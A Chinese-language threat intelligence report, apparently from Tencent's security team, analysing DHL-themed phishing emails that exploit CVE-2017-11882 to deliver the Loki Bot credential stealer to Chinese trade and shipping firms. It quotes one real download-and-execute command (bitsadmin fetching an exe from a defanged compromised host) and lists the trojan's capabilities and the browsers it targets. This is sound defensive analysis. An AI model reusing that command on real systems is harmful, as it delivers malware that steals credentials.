0×1 背景
騰訊御見威脅情報中心監測發現，近期針對中國進出口企業的網絡攻擊再次抬頭。黑客攻擊的目標是中國電子科技、外貿、遠洋運輸企業，攻擊者發送精心準備的與企業業務相關的誘餌郵件，附件是利用Office漏洞（漏洞編號：CVE-2017-11882）特別定制的攻擊文檔，存在漏洞的電腦上打開附件會立刻中毒。漏洞觸發后利用bitsadmin下載Loki Bot木馬并執行，然后竊取受害人員各類賬號密碼等機密信息。
2017年12月5號，騰訊安全御見情報中心曾發布預警：一款針對外貿行業的“商貿信”病毒，將利用CVE-2017-11882漏洞的Word文檔偽裝成采購清單、帳單等文件，通過郵件在全球外貿行業內大量傳播，僅一天時間國內就有約10萬多國內用戶收到此類釣魚郵件。
2018年2月26日捕獲到doc文檔樣本通過下載并運行已被公開源碼的“波尼”木馬，竊取用戶比特幣錢包文件等敏感信息，這些攻擊文檔同樣利用了CVE-2017-11882漏洞。
最新的攔截數據表明，此類定向投放到中國進出口企業的攻擊郵件每天有上千封之多，病毒變種也層出不窮。騰訊安全專家建議中國進出口相關企業務必高度警惕，采用必要的防御措施防止企業機密信息泄露。
攻擊流程：

0×2 具體分析
誘餌郵件為偽裝成國際物流公司DHL發出的寄件包裹確認信。對于運輸業的從業人員而言，此類郵件有相當高的誘導性，很容易被認定為運輸合作伙伴的信件。

內容直譯：

附件doc內容：
 提示“Loading…”

空白圖表

打開郵件doc文檔，觸發CVE-2017-11882漏洞，執行命令行
cmd.exe /c bitsadmin /transfer Fq /priority foreground hxxp://internationalcon.com/ar/home/eat.exe %USERPROFILE%/iWa.exe && start %USERPROFILE%/iWa.exe
bitsadmin.exe 可以用來在windows 命令行下下載文件，是windows 后臺智能傳輸服務的一個工具，windows也會使用它來進行自動更新、下載補丁，此工具在黑客滲透攻擊中也較為流行。

訪問internationalcon.com發現該地址為阿聯酋沙迦的某國際建筑設計公司網站，疑似被黑客攻擊利用。

下載的exe樣本采用aPLib加殼。nlo.exe為.net版；eat.exe為Delphi版，脫殼后都是“Loki Bot”木馬。


“Loki Bot”是在地下網站上銷售的商業惡意軟件，功能為從受感染機器竊取私人數據，然后通過HTTP POST將該信息提交給控制主機。這些私人數據包括存儲的密碼，Web瀏覽器的登錄憑證信息，以及各種加密貨幣錢包等。

裝載功能：
啟動（常駐裝載機）
下載并運行（exe | dll）
下載和投遞
更新木馬
卸載木馬
根據請求從控制端獲取密碼
加載到選定的國家
設置重新連接間隔
獲取截圖
支持的瀏覽器：
Internet Explorer
Mozilla Firefox (x32+x64)
Google Chrome
KMeleon
Comodo Dragon
Comodo IceDragon
SeaMonkey
Opera
Safari
CoolNovo
Rambler Nichrome
RockMelt
Baidu Spark
Chromium
Titan Browser
Torch Browser
Yandex.Browser
Epic Privacy Browser
Sleipnir Browser
Vivaldi
Coowon Browser
Superbird Browser
Chromodo Browser
Mustan Browser
360 Browser
Cyberfox (x32+x64)
Pale Moon
Maxthon browser
Citrio Browser
Chrome Canary
Waterfox
Orbitum
Iridium
支持的 FTP/VNC 客戶端：
Total Commander
FlashFXP
FileZilla
FAR Manager
CyberDuck
Bitvise
NovaFTP
NetDrive
NppFTP
FTPShell
SherrodFTP
MyFTP
FTPBox
FtpInfo
Lines FTP
FullSync
Nexus File